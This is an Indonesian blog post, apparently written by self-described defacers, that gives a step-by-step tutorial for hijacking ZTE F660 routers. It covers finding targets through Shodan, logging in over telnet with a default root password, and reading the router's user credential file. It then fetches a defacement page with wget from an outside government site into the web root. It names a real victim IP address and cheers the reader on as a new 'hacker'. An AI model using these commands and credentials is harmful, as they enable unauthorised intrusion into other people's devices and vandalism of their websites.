Breaking

Kamis, 15 September 2016

Deface Dengan Router ZTE F660

Assalamualaikum Wr.wb ^-^ DeathCreppy & AnonCyber403 Kali Ingin Share Deface Dengan Router ZTE F660 Langsung Saja ^-^ Follow Me ><
DeathCreppy

Ane gak jago ngebait yang panjang.
Langsung aja ya gan.
Siapkan alat tempur agan terlebih dahulu , simple kok , Download of ZOC7 for Windows , nih http://www.emtec.com/cgi-local/download.cgi?what=ZOC7+%28Windows%29&link=zoc%2Fzoc7091.exe&ext=html

1. Dorking target agan di http://shodan.io 



2. Pilih salah satu target


3. Coba buka di browser dulu IP nya


4. Done , sekarang buka ZOC7nya dan masukin IP target


5. ane menggunakan port 1023 , port default biasanya port 23 , karna port telnet yang terbuka hanya 1023 , jadi saya pake port 1023
6. Tekan Open , Tunggu bentar , connect , masukin username login dan password , user:rootpass:Zte521


7. Lalu Ketikan cat /userconfig/cfg/db_user_cfg.xml , Nanti Akan Muncul Seperti Yang Bi Bawah Berarti "Vuln" Jika Tidak Silahkan Cari Target Lain ^-^

8. ketikkan cd home/httpd/ , lalu kita buat lah file deface dengan perintah wget  http://gununggedekel.tasikmalayakota.go.id/ 
http://gununggedekel.tasikmalayakota.go.id/ Hasil Deface Kalian ^-^  ,
Cara Manggilnya http://181.225.173.105/ Tambahkan /index.html di belakang IP terserbut
http://181.225.173.105/index.html


Atau menggunakan script deface html , ketikkan wget -O DC.html http://gununggedekel.tasikmalayakota.go.id/  ^-^ Cara Manggilnya Sama Seperti Yang Di Atas http://181.225.173.105/dc.html 


8. Done , selamat anda sudah jadi hacker , beritahukan adik, kakak, ayah , ibu , tetangga dekat , sanak keluarga, teman temanmu , jika anda sudah jadi Hacker :3 :v 

oh ya , jangan lupa ane nitip nick "DeathCreppy" dan Temen Ane AnonCyber403 gitu aja :)


Wassalamualaikum wr.wb


2 komentar:

Adbox